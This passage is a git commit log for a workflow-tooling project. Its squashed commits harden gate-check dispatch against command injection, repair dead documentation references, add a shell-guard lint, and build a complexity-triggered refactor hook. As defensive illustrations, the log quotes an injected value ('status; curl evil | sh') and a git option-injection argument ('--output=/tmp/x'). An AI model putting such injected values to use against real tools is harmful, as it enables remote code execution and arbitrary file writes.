before it, dispatch never left the two first-party arms. gates[].check is not one
of the four executable surfaces the install consent prompt discloses (hooks,
command modules, mcpServers, reviewer lanes), so a capability can be consented to
as declarative-only and still reach a shell here. An unvalidated check.query of
'status; curl evil | sh' would be interpolated straight into a command
substitution. The arm now carries the same in-context validation contract
loop-hook-dispatch.md already mandates for ref.command, and the predicate arm is
specified as a single argv element so an apostrophe cannot close the literal.

TESTS: the first-cut regression tests only asserted that the shared loop phrase and
the evaluator substrings co-occurred. A partial regression that kept the phrase but
deleted the default arm would have passed them. Added a structural assertion that a
distinguishable catch-all arm exists, comes after every named branch, and is where
the generic evaluator is actually invoked.

REFERENCE DRIFT: loop-hook-dispatch.md documented onError as skip/'fail', but the
generated registry, all 35 manifest declarations, and all four dispatch sites use
skip/halt — 'fail' appears nowhere. Corrected, since this PR newly cites that doc
as ship.md's authority.

Also notes the named-query arg convention's provenance (mirrors verify:pre verbatim;
no capability declares a ship:pre query gate today).

* fix(3559): close the same gate-check injection at all four sibling dispatch sites

Maintainer directed fixing the sibling sites inline rather than filing them.

The command-injection surface fixed at ship:pre is a FAMILY property, not a site
property: every workflow that interpolates a manifest-supplied check.query into a
shell command substitution has it. Root cause is in the contract, not the sites —
references/loop-hook-dispatch.md mandates in-context validation for step ->
ref.command and OMITS the same requirement for gate, so all four gate consumers
inherited an unstated rule.

Closed at the source (the reference's gate section now carries the rule) and at
every consumer:
  execute-phase.md  execute:wave:post, execute:post
  plan-phase.md     plan:post
  verify-work.md    verify:pre
  ship.md           ship:pre  (already hardened in a2d84a77)

TESTS: section 6 enumerates the family by DISCOVERY, not by a hardcoded list, so a
new dispatch site added later without the validation contract fails instead of
shipping — the same 'hardcoded list silently misses members' mistake #3559 itself
was. It asserts, per discovered site, that the charset is pinned, that validation is
specified as in-context, and that the rule appears BEFORE the interpolation it
guards (an executing agent reads top-down). A floor assertion fails the section if
the discovery regex ever stops matching, so it cannot pass vacuously. Two further
tests pin the reference's gate section and the halt/skip onError vocabulary.

Sizes all within tier caps: execute-phase 94378/98304, plan-phase 91008/98304,
verify-work 39488/61440, ship 38067/40960. Drift acks amended for each.

* fix(3559): fit the validation mandate under the frozen pre-phase-6 ceiling

The previous commit blew tests/claude-orchestration.test.cjs's frozen ADR-857
pre-phase-6 ceiling for execute-phase.md (93600): the file had only 209 bytes of
headroom and the inline validation paragraph added 987. That ceiling is a ratchet
proving Phase 6 extraction happened — raising it is never the answer.

Restructured so the RULE lives once, in the reference's gate section (charset,
in-context, single-argv, and the consent-surface rationale), and each of the five
dispatch sites carries a terse mandate plus a pointer to it. That is strictly better
than five verbatim restatements: this PR exists partly because the reference and its
implementations had already drifted apart on the onError vocabulary, and five copies
of a security rule is that same failure waiting to recur. execute-phase.md already
eagerly inlines the reference (@-form at its step-hook dispatch), so an executing
agent has the full rule in context regardless.

Also reclaimed genuinely duplicated bytes at the execute:post site, whose prose
restated both commands the fenced block immediately below already shows, and whose
tail restated the two-step contract that the execute:wave:post site spells out in
full.

Net sizes vs origin/next:
  execute-phase.md  93365  (-26, SHRINKS)  pre-phase-6 93600, margin 235 (was 209)
  plan-phase.md     90627  (+111)          tier cap 98304
  verify-work.md    39107  (+111)          tier cap 61440
  ship.md           36784  (+3058)         tier cap 40960

Because execute-phase.md now shrinks, its drift-ack entry was reverted — an ack that
is never consumed is reported as STALE and fails the check. The other three acks
carry corrected byte figures.

Tests follow the same split: section 6 asserts the mandate + pointer per discovered
site and the full rule in the reference; section 5's security test drops the inline
charset assertion it can no longer make of ship.md.

* fix(3559): repair an over-escaped regex in the security assertion

/loop-hook-dispatch\\.md/ matched a literal backslash before .md, so it could never
match and the [security] assertion failed on the remote runner even though the prose
it checks was correct. The over-escaping came from nesting a regex through a shell
string into a node -e script; the sibling literal in section 6, written via a quoted
heredoc, was unaffected.

The reason this reached the runner at all is that the local check re-typed the regex
by hand instead of executing the one in the file, so it validated a different pattern
than the test used. Replaced that habit with two harnesses that read the literals FROM
the source: one asserts every regex literal in the file matches something in the real
workflow/reference corpus (catching over-escaping generically), the other evaluates
the [security] and section-6 literals against their actual targets.

* chore(3559): backfill changeset PR number (#3608)

---------

Co-authored-by: sim <sim@local>
2026-08-17 22:28:05 -04:00
Tom Boucher
ec7e49a64c fix(#3576): repair all 43 dead references/ cites and gate the canonical resolvable form (#3596)
* test(#3576): gate shipped reference citations on the canonical resolvable form

Failing-first gate for #3576: a backticked bare references/<name>.md cite
resolves from no install location (agents, workflows, and references all
install where a bare relative references/ path is dead). The gate walks the
runtime-loaded trees the issue prescribes, strips @~/ include tokens
PER-TOKEN (a line-skip guard would miss a bare cite sharing a line with an
include — the issue-named trap), pins the genuinely relative ../ href and
canonical forms as non-offenders, and checks canonical cite targets exist.
43 offenders today across 19 files.

* fix(#3576): repair all 43 dead references/ cites to the canonical resolvable form

Every backticked bare references/<name>.md cite across the 19 shipped files
rewritten to gsd-core/references/<name>.md — the form every required_reading
block and @~/ include already uses, and the only form that resolves from any
install location. All 20 cited targets verified to exist; the one genuinely
relative href (plan-phase.md's ../references/mvp-concepts.md) is untouched
(the repair is backtick-anchored). Growth acks: new fragment for the three
first-time paths, #3206-pattern appends to the five fragments already naming
the other grown files (two ack sources may never name the same path).
execute-phase.md lands at 93,391/93,400 and gsd-executor.md at 49,150/49,152
— exactly the issue's projections; every repair fits.

* fix(#3576): drop stale default.md growth ack (nested modes file is hash-attributed, not growth-ratcheted)

Review finding: the emitted-attribution ratchet covers only top-level
workflows/ + agents/ files; discuss-phase/modes/default.md's delta is
source-attributed, so acknowledging its growth is a stale entry the
differential lane fails on.

* chore(#3576): add changeset fragment

* chore(#3576): backfill changeset pr number

---------

Co-authored-by: sim <sim@local>
2026-08-17 15:24:24 -04:00
Tom Boucher
1591454357 feat(#3409): reject shell guards that cannot observe their own failure arm (#3558)
* test(#3409): failing-first regression tests for unreachable shell guard arms

Drives the three live defects fail-first, executing the shipped workflow
snippets rather than a re-typed copy:

- G1/G2 plan-phase.md Walking Skeleton gate reads `--pick summaries_total`,
  a field that does not exist, so PRIOR_SUMMARIES is always "" and the gate
  has never fired (#3365). G2 is the load-bearing negative-space case: it
  rejects a fix that treats "no answer" as "zero" and fires unconditionally.
- G3 plan-phase.md PHASE_REQ_IDS resolves "" instead of the TBD sentinel on
  a phase with zero requirements.
- G4 complete-milestone.md's bare `cat <glob>` blocks on stdin under a
  nullglob left set by an earlier block (measured hang).

Skipped on Windows for G4 only: the FIFO-blocked-stdin mechanism is POSIX
only, and a weakened assertion there would pass vacuously.

Refs #3409

* fix(#3409): make nine shell guards observe their own failure arm

`--pick` coerces a missing field to empty string and exits 0, so the
`|| echo <default>` fallback after it fires only on a verb typo, never on
the field absence it was written for. Nine sites relied on that arm.

- plan-phase.md walking-skeleton gate: `--pick summaries_total` names a
  field that does not exist under any flag combination, so the gate has
  never fired on any project (#3365). Repointed at the existing single
  owner, `phases.list --type summaries --pick count`, which returns a real
  integer in every case including a project with no `.planning` directory.
  No new counter is added: a second one would duplicate the ownership
  ADR-3180 Decision 1 forbids. The gate now fires only on a literal "0",
  so an unanswerable query fails safe instead of entering skeleton mode.
- plan-phase.md phase_req_ids: now falls back to the documented TBD.
- The remaining seven convert to an explicit empty test.
- complete-milestone.md read all phase summaries through a bare
  `cat <glob>`; under a nullglob left set by an earlier block that is zero
  operands, so cat blocks on stdin. Guarded with the array shape the
  #3300 fix already established in review.md.

Refs #3409

* fix(#3409): guard eleven more globs that defeat their own fallback arm

The nullglob audit this issue asks for turned up the same class in files
#3300 never touched.

- Eight bare `cat <glob>` reads (transition, complete-milestone, planner x4,
  verifier, phase-researcher). With nullglob set that is zero operands, so
  cat reads stdin and blocks; measured rc=137 at 3s.
- Three `ls <glob> || echo "<message>"` sites (session-report,
  review-backlog and its generated skill). nullglob makes ls succeed
  listing the cwd, so the message never prints and the user gets a
  directory listing instead.

Guarded with `[ -e "${_ARR[0]}" ]` rather than `[ ${#_ARR[@]} -gt 0 ]`.
The count form is correct only when nullglob is set, and six of these
seven files never set it: without it the array holds the unmatched literal
pattern, so the count is 1 and the guard passes wrongly. `-e` is correct
in both worlds. review.md keeps its count guards — that block sets
nullglob two lines above them.

skills/gsd-review-backlog regenerated from commands/, never hand-edited.

Refs #3409

* feat(#3409): add the unreachable-shell-guard drift lint

A sibling of lint-planning-prompt-drift.cjs, consuming the shared
scripts/lib/drift-scan.cjs rather than copying it, wired into lint:ci.

Both detectors are one shape — a fallback arm defeated by a legitimate
success-on-empty:

- Detector A: `--pick` and `|| echo` on one line. `--pick` is the
  discriminator because "missing field renders empty at exit 0" is a
  documented CLI contract, not a heuristic. A rule keyed on gsd_run
  matched 111 lines, ~132 of them legitimate, and was rejected.
- Detector B: `cat <glob>` in command position, and `ls <glob>` whose
  exit code feeds a real fallback or an if/while head. Informational
  `ls <glob>` whose stdout is consumed (97 sites) and `|| true` failure
  suppression (~15) are not guards and never fire.

Shrink-only ratchet keyed on (file, trimmed text) with a per-pair count,
POSIX-normalized unconditionally so Windows CI cannot report everything
fresh and stale at once. Ships with a ZERO-entry baseline: every site it
can find is fixed. Exemption is the per-line `# gsd-scan-ignore: #NNN`
marker whose reason must name an issue or URL; a malformed reason reports
a distinct error rather than silently exempting. No file allowlists.

ADR-3409 records the invariant, the measurements behind both detectors,
and why the upstream `--pick` contract fix belongs to #3473.

Refs #3409

* fix(#3409): resolve review findings — typed surface, sanitized reports, tighter marker

Standards axis (blocker): the guard's tests asserted on human-readable
stdout/stderr and on free-form baseline-load prose, which CONTRIBUTING
prohibits by name. Added the typed surface it prescribes instead of
weakening the tests: a frozen REASON enum, a --json report mode,
structured loadBaseline errors, and a test locking Object.keys(REASON)
so a new reason stays three coordinated changes.

Security axis: sanitizeForReport covered every violation field but not
the baseline-load error path, which embeds raw JSON.stringify output --
that escapes nothing above 0x1f, so bidi and C1 controls reached CI logs
unfiltered. Routed through the sanitizer at the output seam.

Security axis: the scan-ignore marker accepted `#0` and a bare
`http://`. Tightened to a positive issue number and a URL with a host.
This diverges deliberately from the sibling in
tests/commit-files-pathspec.test.cjs, whose looser form was copied
verbatim; the header now records the divergence.

Security axis: G4 built its FIFO with `mktemp -u`, reserving a name
without creating it. Now created inside a `mktemp -d` directory.

Spec axis: ADR-3409 claimed a ninth site landed after the issue was
filed. git blame disproves it -- all nine predate it; the issue's hand
count missed one. Corrected. The design and test matrix still specified
B9 as a FLAG after implementation reversed it to PASS; both now record
the reversal and why.

Refs #3409

* docs(#3409): add the how-to for resolving unreachable-guard findings

Reference and Explanation are carried by ADR-3409; this is the
task-oriented quadrant CI cannot check for.

The page exists mainly for one thing the lint structurally cannot catch:
both `[ -e "${_ARR[0]}" ]` and `[ ${#_ARR[@]} -gt 0 ]` remove the glob
from the command and therefore both pass, but the count form is correct
only when nullglob is set — and nullglob is usually set in a different
block of the same file. A reference table cannot carry that; a how-to can.

Also documents the reason codes, so a reader can tell "nothing to report"
from "could not look".

No tutorial: this is a gate inside an existing CI loop, not a new entry
point a newcomer starts from.

Refs #3409

* fix(#3409): bring the touched prompt files back under their size gates

The remote run was red on 14 tests, all size/attribution, none of them
the regression suite.

- agents/gsd-planner.md was 194 chars over a 49152 cap enforced by four
  separate tests, each of which says the remedy is extraction, not a bump.
  It had 41 chars of headroom before this branch. Its `## Checkpoint
  Types` section was an unlinked, condensed duplicate of
  references/checkpoints.md, which already carries all three types and
  their XML shapes; the section now points there and keeps the three
  names and percentages inline. Net -969, margin 1010.
- gsd-core/workflows/execute-phase.md sat 2 chars under a comfortable
  margin assertion. Dropped the AUTO_MODE default: the `|| echo "false"`
  it replaced was unreachable, so the value was already sometimes empty
  on next, and its only consumer compares against `true`. Net -16.
  Left plan-phase.md's AUTO_CHAIN default alone -- that file names an
  explicit `false` branch, so empty would match neither branch.
- Acknowledged the seven prompt files that genuinely grew, one specific
  reason each. Five of those paths were already claimed by spent
  fragments identical to next, which blocks a second source naming the
  same path; removed just the colliding key from each, deleting the two
  that this emptied.

Refs #3409

* test(#3409): extract the whole PHASE_REQ_IDS block, not just its first line

G3 failed on the remote runner with '' !== 'TBD'. The test was wrong, not
the workflow.

The shipped contract is now two consecutive lines -- the capture and the
`${PHASE_REQ_IDS:-TBD}` default -- but the helper's `^PREFIX=.*$` regex
returns only the first match, so the test executed half the contract and
correctly observed the empty string. Renamed to extractAssignmentBlockFor
and taught it to consume the contiguous run of lines sharing the prefix.

The assertion is untouched: TBD is the right expectation, and weakening
it to accept the empty string would have reinstated exactly the class
this suite exists to catch -- a check that cannot observe the thing it
is checking.

extractFencedBashAfterAnchor is unaffected: it is fence-delimited rather
than line-anchored, so G1/G2/G4 still capture their full blocks.

Refs #3409

* chore(#3409): drop a spent ack fragment that collided on complete-milestone.md

#3458 landed on next while this branch was in flight and its fragment
claims complete-milestone.md, which this branch also grows. Two ack
sources may never name the same path.

Its entry is spent: the +9163 it explains is already absorbed at base, so
it can no longer clear anything, and the checker's own guidance for spent
entries is to delete them. Removing the key emptied the fragment, so the
file goes too -- an empty one signals nothing.

Refs #3409

* chore(#3409): backfill changeset pr number 3558

* test(#3409): hoist a regex subject out of exec() to clear the injection scan

CI's prompt-injection scan flagged `MARKER_RE.exec('# gsd-scan-ignore: ...')`.
The pattern `exec[[:space:]]*\(["']` is receiver-blind on purpose, so it
catches `require('child_process').exec('...')` -- and the scanner's own
header records that RegExp.prototype.exec is collateral, to be handled by
its allowlist.

Allowlisting the file would blind it to the real exec vector permanently,
so the subject is hoisted into a const instead: same assertion, scanner
left at full strength, no security surface widened.

Refs #3409

---------

Co-authored-by: sim <sim@local>
2026-08-15 21:09:05 -04:00
Tom Boucher
8fc88f663d fix(#3210): gate unmet preconditions as blocking-human; cap blocker retries at needs_human (#3528)
* fix(#3210): gate unmet preconditions as blocking-human and cap blocker retries at needs_human

* chore(#3210): add changeset fragment for PR #3528

* fix(#3210): restore blocking-human carve-out and CRLF-safe split

---------

Co-authored-by: sim <sim@local>
2026-08-14 23:01:30 -04:00
Tom Boucher
71180983a0 fix(#3423): standardize on <required_reading>, retire the files_to_read emit tag (#3432)
* fix(#3423): standardize on required_reading, retire files_to_read emit tag

* test(#3423): flip tag assertions, extend consistency guard to spawner surfaces

* fix(#3423): sweep capabilities fragments, regen registry+skills, anchor executor test

* chore(#3423): acknowledge tag-rename emitted ripples and workflow growth

* chore(#3423): broaden emitted-ripple acknowledgment to all embedders

* chore(#3423): settle emitted-drift acks post-rebase (merge 3004/1689-owned keys)

* chore(#3423): drop stale ripple acks, ack execute-phase growth

* chore(#3423): restore pristine 3004 fragment, keep only consumed appends

* chore(#3423): backfill changeset pr number

* chore(#3423): settle emitted-drift acks post-merge (move code-review-fix ripple into 3190, tag-rename ripples into 3191/3297)

* chore(#3423): re-arm 3324 ack for execute-phase.md tag-rename ripple

* fix(#3423): trim 8 bytes from execute-phase model note to hold ADR-857 margin, re-arm 3370 ack for net +4 growth

---------

Co-authored-by: sim <sim@local>
2026-08-14 16:03:48 -04:00
Tom Boucher
362d0434b2 fix(#3370): state checkpoint gate semantics in executor dispatch prompts (#3478)
* fix(#3370): state checkpoint gate semantics in executor dispatch prompts

* fix(#3370): set changeset pr to 3478

* fix(#3370): keep gate rule in routing fragment under phase-6 ceiling

---------

Co-authored-by: sim <sim@local>
2026-08-14 11:42:22 -04:00
Tom Boucher
5452f1a700 fix(#3324): build-time embed execution context instead of literal @-includes (#3462)
* fix(#3324): build-time embed execution context instead of literal @-includes

* chore(#3324): add changeset

* chore(#3324): set changeset pr reference

* fix(#3324): trim embed note to stay under the 93400 margin ceiling

---------

Co-authored-by: sim <sim@local>
2026-08-14 10:33:09 -04:00
Tom Boucher
7976b1ca0d feat(#1689): per-plan agent_hint executor routing (#3417)
* feat(#1689): per-plan agent_hint executor routing

Option A per-plan specialist routing: a plan with an `agent_hint:` frontmatter field is dispatched to that subagent instead of gsd-executor when it resolves on the active runtime; absent/unresolved/disabled falls back to gsd-executor (byte-identical). Default-on via workflow.agent_hint_routing.

- src/phase.cts: parse agent_hint into the plan-index JSON (plan_json.agent_hint)
- agent-install-check.cts: resolveAgentHint() reuses getAgentsDir + runtime filename variants; probes project + global agent dirs; fails closed; rejects path-traversing names
- gsd-tools.cjs: 'resolve-agent' query route (fail-closed to gsd-executor; --raw/--json)
- execute-phase.md: lean per-plan reference + {EXECUTOR_TYPE} placeholder (host stays under the ADR-857 Phase 6 byte ceiling)
- execute-phase/steps/per-plan-executor-routing.md: resolution logic (Agent()-based dispatch; advisory on orchestrator-worktree)
- config: workflow.agent_hint_routing (validKey, default-on via SCHEMA_DEFAULTS, boolean validator)
- docs (CONFIGURATION.md, plan-md.md), changeset, tests/agent-hint-routing-1689.test.cjs (17 tests)

* chore(#1689): backfill changeset PR number (#3417)

* chore(#1689): regenerate install-tree fixtures for new workflow fragment

* chore(#1689): ack deliberate execute-phase.md growth (agent_hint routing)

* test(#1689): SPAWN contract allows parameterized subagent_type placeholder

agent-frontmatter's spawn-type checks scanned subagent_type="..." as a
concrete agent name. execute-phase now uses subagent_type="{EXECUTOR_TYPE}"
(a runtime placeholder resolved via resolve-agent, default gsd-executor).
Skip {TOKEN} placeholders in both the known-type and <available_agent_types>
checks; execute-phase still lists the built-in roster incl. gsd-executor.

* fix(#1689): CI conformance for the routing fragment

- per-plan-executor-routing.md: add the canonical runtime-launcher preamble to
  its gsd_run block (runtime-launcher-parity #373), matching sibling step fragments.
- agent-install-check.cts: drop a literal ~/.claude/agents path from the
  resolveAgentHint JSDoc so it does not leak into the compiled engine .cjs
  (cline install leak guard).

---------

Co-authored-by: sim <sim@local>
2026-08-13 23:10:52 -04:00
Tom Boucher
b77b7f8e56 fix(#1526): delegate auto-chain post-completion to transition workflow (#3419)
* fix(#1526): delegate auto-chain post-completion to transition workflow

execute-phase's auto-chain completion called phase.complete then a light inline
set (partial PROJECT.md update + offer-next) and never invoked the transition
workflow, silently skipping graduation scan, session-continuity, project-reference,
accumulated-context, and current-position updates — so a phase completed via
auto-chain left different project state than a normal transition.

Fix (delegate, user decision 2026-08-13): replace execute-phase's update_project_md
+ offer_next with a delegation step that @-includes transition.md in post-completion
mode. Add a post_completion_mode step to transition.md that skips verify_completion
+ update_roadmap_and_state (phase.complete already ran; avoids double-write) and
begins at evolve_project. Standalone transition (mode 1) is unchanged.

Regression: tests/auto-chain-transition-delegation.test.cjs (source-text-is-the-
product) asserts the delegation, the skip-set, the removed inline step, and the mode.
Ack fragment 1526 covers execute-phase.md + transition.md growth (spent 2930 fragment
removed — same-path owner conflict, like #3025/#3024).

* docs(#1526): backfill changeset PR number (#3419)

---------

Co-authored-by: sim <sim@local>
2026-08-13 20:31:55 -04:00
Tom Boucher
b901d1e06f feat(#1953): complexity-triggered refactor extension point (execute:post) (#3261)
* test(#1953): failing-first suite for the complexity-triggered refactor hook

60 behavioral cases against src/complexity-trigger.cts, which does not exist yet:
decision-point counting, the comment/literal stripping leak surface, threshold and
jump-delta boundaries at limit-1/limit/limit+1, stable-anchor baseline semantics,
and fs fault injection via mock.method. Two fast-check properties assert that
stripping never manufactures a decision point and that comments and string
literals are score-neutral.

Also registers the refactor-trigger capability manifest (inert until
refactor.trigger_enabled) and regenerates the capability registry and matrix.

Verified RED on the remote runner before any implementation exists.

* feat(#1953): complexity-triggered refactor extension point

Adds the opt-in refactor-trigger capability. After a phase executes, an
execute:post step measures per-function complexity for the files the phase
touched and writes a scoped refactor proposal when a function crosses the
configured threshold or drifts past its recorded anchor.

Design notes worth carrying:

- The signal is computed in-core (decision-point counting over comment- and
  literal-stripped source, Node builtins only) rather than via Memtrace or a
  shelled-out analyzer. The hook fires as a deterministic CLI, not an agent
  with MCP tools, and core takes no external dependencies — this is the only
  option a behavioral test can bind to. The metric sits behind a seam.
- The baseline is a stable anchor, not a rolling value: set on first
  observation, moved only on disposition. A rolling baseline makes the delta
  the single-phase change, so a function creeping +2 per phase never trips a
  delta of 5 and the jump check adds nothing over the absolute threshold.
- Strict mode records an open deviation window in the broken-windows ledger
  rather than declaring its own ship:pre gate. ship.md has no generic ship:pre
  gate dispatch — only two hardcoded branches — so a third gate of any kind
  would be declared and never evaluated.
- The gate clears on the proposal being dispositioned, never on the score
  improving. A blocking complexity number is one an executor can satisfy by
  splitting a coherent function in two.

execute-phase.md gains a generic execute:post step-dispatch contract; it
previously matched only ref.skill == "code-review", so any other step
registered there was declared and never run. The code-review branch is
unchanged.

Full rationale in ADR-1953.

Closes #1953

* fix(#1953): close git option injection and symlink escape in the refactor hook

Three findings from the isolated security review, all fixed inline.

HIGH — changedFilesSince interpolated the --since value into a revision
token placed before the -- separator. A -- only stops PATHSPEC parsing of
arguments after it; git still option-parses what comes before. So
--since '--output=/tmp/x' became --output=/tmp/x..HEAD, which git accepts
as --output=<file> and uses to redirect diff output — an arbitrary write.
Fixed with --end-of-options before the revision range plus a conservative
ref validator. The validator deliberately permits ~ ^ @ { } because those
are legitimate git REVISION syntax (HEAD~1, main@{yesterday}) as distinct
from ref-NAME syntax; --end-of-options is the actual barrier. The doc
comment asserting the trailing -- was sufficient was wrong and is corrected.

MEDIUM — resolveConfinedPath confined by string prefix only, so a symlink
committed inside the repo passed the check (its own path is under cwd) and
readFileSync then followed it outside the root. Now lstat-checks for a
regular file and skips anything else with REFACTOR_FILE_UNREADABLE, so one
bad path skips one file and the run continues.

LOW — the new execute:post dispatch contract showed the gsd_run example
before the rule requiring ref.command be validated first. That prose is
executed by an agent, so textual order is execution order. Reordered.

Refs #1953

* fix(#1953): make the analyzer able to see TypeScript at all

Found by running the shipped analyzer over its own source: it reported
functions=1 for a 940-line module with 24 function forms. A return-type
annotation or a generic parameter list made a function invisible —
`function f(a): number {}` and `function f<T>(a: T): T {}` both detected as
zero. Since gsd-core is written in .cts and the capability declares
.ts/.cts/.mts analyzable, the feature silently found nothing in this repo's
own primary language while reporting success. A safety net that reports
"all clear" because it cannot see is worse than no safety net.

All 98 tests passed over this, because every fixture was plain JS — the
exact failure the test matrix's own "assert against the shape production
uses" warning describes. Adds a TypeScript-shapes suite covering return
types (including unions, generics, object literals and type predicates),
generic parameter lists (constrained and defaulted), export/async/generator
combinations, annotated arrows, class-method modifiers, and optional/
default/rest params — plus the two traps: an overload signature has no body
and must not count, and `a < b && c > d` is a comparison, not a generic.
Detection now reports 24/37/21 functions for the three source files, which
matches a hand count exactly.

Also from review:

- The strict-mode ledger dedup identified entries by parsing a prose
  description string. That is banned by CONTRIBUTING's raw-text-matching
  rule and was a real bug: the "exactly one window per untriaged proposal"
  guarantee rested on prose matching, so rewording a description or editing
  WINDOWS.md by hand silently produced duplicates. Now matches structurally
  on kind + phase + file + line.
- A property test asserted on the stripper's output text. Reframed to
  assert the same invariant through analyzeSource's score.
- nextBaseline's `candidates` parameter has been dead since the anchor
  change; removed from the signature and all call sites.
- Extracted the duplicated require-or-degrade and capability-check
  boilerplate.
- ADR-1953's Implementation bullet still named a `refactor.ship-gate` in
  check-command-router.cts — a leftover from the design cut D6 rejects.
  That file is untouched and no such gate exists. Removed.

Refs #1953

* fix(#1953): keep execute-phase.md under its byte ceiling; un-vacuum the large-file test

Five of the seven remote-runner failures were one cause: the execute:post
dispatch contract, written out inline, grew execute-phase.md 1876 bytes
(93,400 -> 95,276) against a frozen PRE_PHASE6 ceiling of 93,600. A drift-ack
does not clear that — tests/phase6-capstone-conformance.test.cjs and
tests/fix-2285-claude-orchestration-wiring.test.cjs assert the file is
literally under the cap.

The contract now lives in gsd-core/references/loop-hook-dispatch.md, which
already claimed to be the point-agnostic dispatch reference and already
documented ref.skill and ref.agent. It gains the ref.command shape, its
in-context validation rule, the advisory-by-construction statement, and a
note that a point whose workflow hand-rolls one kind is not implementing
this contract. execute-phase.md now defers to it in one line: 145 bytes of
growth, 55 B of headroom under the cap. Better placement than the first cut
— the reference was overstating its coverage, and this makes the claim true
rather than duplicating prose next to it.

Acknowledged by appending to tests/emitted-drift-acks/2930-*.json rather
than a new 1953-*.json: two ack sources may never name the same path, and
that fragment is already the accumulating ack for this file.

Sixth and seventh failures: analyzesLargeFileWithinBounds tripped its own
vacuity guard — the fixture generated ~480 KB against a `> 500000` assert,
so the guard fired and the three assertions after it never ran. The test
has been vacuous since it was written. The matrix row specifies ~1 MB, so
N goes 8000 -> 20000 (1.17 MB, 17% margin) and the guard to > 1_000_000.
Verified by reproducing the exact body against the compiled module: 1168888
bytes, 118 ms, all four assertions hold.

Refs #1953

* fix(#1953): fold the execute:post step deferral into the existing resolve line

The remaining two failures were one test: execute-phase.md carries a SECOND,
tighter assertion than the 93,600 ceiling — `<=93400`, which is exactly its
current size. The file cannot grow by a single byte. My previous fix got it
under 93,600 but not under 93,400, so it still failed. ("H." in the report is
just the parent describe of that same test, not a separate defect.)

Rather than add a paragraph, the deferral now REPLACES the existing hook
resolution line. It read:

  Resolve active step hooks from `EXECUTE_POST_HOOKS_JSON` where
  `kind == "step"` and `ref.skill == "code-review"`.

which is the bug itself written down — only code-review was ever dispatched.
It now reads:

  Dispatch each `kind == "step"` hook per
  @gsd-core/references/loop-hook-dispatch.md. For `code-review`:

The following prose already begins "If no active code-review step hook
exists", so it reads correctly and the code-review handling is untouched.
Net effect on the file is -11 bytes: 93,400 -> 93,389, under the margin
assertion rather than merely under the ceiling.

That also removes the need for a drift-ack: the file shrank, so there is no
growth to acknowledge, and the append to the shared 2930-*.json fragment is
reverted. Leaving it would have shipped a claim of "145 bytes of growth"
that is no longer true, on a file six other issues share.

The test's own comment states the principle this ended up honoring: "the host
loop must stay small — optional-feature detail belongs in the capability
fragment, not the host workflow." Putting the dispatch contract in the
reference rather than inline is that rule, applied.

Refs #1953

* fix(#1953): keep the code-review hook literal the workflow test requires

tests/code-review.test.cjs extracts the <step name="code_review_gate"> block
and asserts it contains `ref.skill == "code-review"` verbatim. The previous
commit replaced the line carrying that literal, so the token vanished and the
test went red — a fair assertion: code-review IS the bespoke branch there and
the workflow should still name it.

Restored inside the same one-line deferral, which now reads:

  Dispatch `kind == "step"` hooks per @gsd-core/references/loop-hook-dispatch.md.
  `ref.skill == "code-review"`:

93,396 bytes — still under the `<=93400` margin assertion and 4 bytes below
the base, so the file continues to shrink rather than grow.

Because three consecutive runs were each reddened by a different assertion on
this one file, this change was verified by sweeping ALL of them at once rather
than one run at a time: every test under tests/ that reads execute-phase.md or
references/loop-hook-dispatch.md was located by resolving its path constants,
and each content/size assertion was evaluated directly against the working
tree — 22 assertions, plus two real executions (gen-section-manifest --check,
and emitted-attribution's full real-tree differential). All pass.

That sweep also confirms the earlier judgement call: the net change to
execute-phase.md is a SHRINK, and the size ratchet only gates growth, so
reverting the append to the shared 2930-*.json ack fragment was correct — an
ack would have been both unnecessary and factually wrong.

Refs #1953

* chore(#1953): backfill changeset pr number to 3261

* docs(#1953): add the missing how-to for acting on a refactor proposal

Reference and explanation shipped (COMMANDS.md, CONFIGURATION.md,
FEATURES.md 159, ADR-1953) but the Diataxis how-to quadrant did not, and
that is the one a user reaches for. CONTRIBUTING's required-docs table is
'new command -> COMMANDS.md + FEATURES.md', so CI was green on a gap.

Enabling this feature is genuinely multi-step and no single page walked it:
turn it on, tune the threshold, understand advisory vs strict, discover
that strict needs a SECOND toggle on a DIFFERENT capability, and know what
to do when a proposal appears. The two-toggle subtlety in particular was a
footnote in a config table; here it is a section with both commands.

Follows the shape of its closest siblings, resolve-edge-coverage-findings
and resolve-prohibition-findings — both 'the loop surfaced a finding, here
is what to do with it'. Includes a reason-code table for the silent cases,
since the analyzer is deliberately quiet in six situations and a user who
expected a proposal needs to tell 'nothing to report' from 'could not look'.

Indexed from docs/README.md beside the other loop how-tos.

Docs-only: exempt from the push gate, no re-verification, pass marker on
2af188b4 untouched.

Refs #1953

* feat(#1953): warn when strict mode is on but nothing will actually block

Closes acceptance criterion 5, which I had wrongly marked satisfied.

refactor.trigger_strict records an untriaged proposal as an open deviation
window, but a ship only STOPS if workflow.windows_enforce is also on — a
toggle owned by the broken-windows capability that this feature neither sets
nor requires. So a user could enable strict, believe ship was gated, and find
out otherwise at ship time.

The split itself stays: requires:["broken-windows"] would force-install the
ledger on advisory users who never enable strict, and a ship:pre gate of our
own would never fire because ship.md has no generic ship:pre gate dispatch.
What was missing was discoverability, so that is what this fixes.

`refactor evaluate` now emits a typed REFACTOR_STRICT_NOT_ENFORCING warning,
naming the exact remediation command, whenever strict is on and either
workflow.windows_enforce is off or broken-windows is unavailable. It fires
only on a run that produced a candidate — with nothing to block on there is
nothing to warn about, and warning every run would be noise.

Reads workflow.windows_enforce through the same resolveConfigKey walk the
router already uses for its own keys rather than a second config reader.
Four tests cover the matrix: strict+enforce-off warns, strict+enforce-on does
not, strict+ledger-absent warns, strict-off never warns.

Also corrects a user-facing message in this same file that told the user to
run `gsd-tools config-set` — the wrong form. docs/CONFIGURATION.md and the
broken-windows capability both use `gsd config-set`, and gsd-tools is invoked
as `node gsd-tools.cjs`, so the bare form may not resolve. The two adjacent
messages in this file now agree.

Refs #1953

---------

Co-authored-by: sim <sim@local>
2026-08-09 19:52:47 -04:00
Tom Boucher
3c2be9be1b fix(#3177): correct the stale Claude Code Agent() dispatch claim in two workflows (#3281)
* test(#3177): failing-first guard for stale Agent() dispatch claim

* fix(#3177): correct stale Claude Code Agent() dispatch claim

* fix(#3177): apply review findings and cover debug.md dispatch

* fix(#3177): fit execute-phase correction under the 93400 byte margin

* docs(#3177): clarify changeset covers both debug dispatches

* chore(#3177): backfill changeset PR number

---------

Co-authored-by: sim <sim@local>
2026-08-09 19:51:48 -04:00
Tom Boucher
a5706bd39d enhance(#2596): validate a wave branch's committed diff stays in its declared scope (#3264)
* test(#2596): failing-first suite for worktree-wave scope conformance

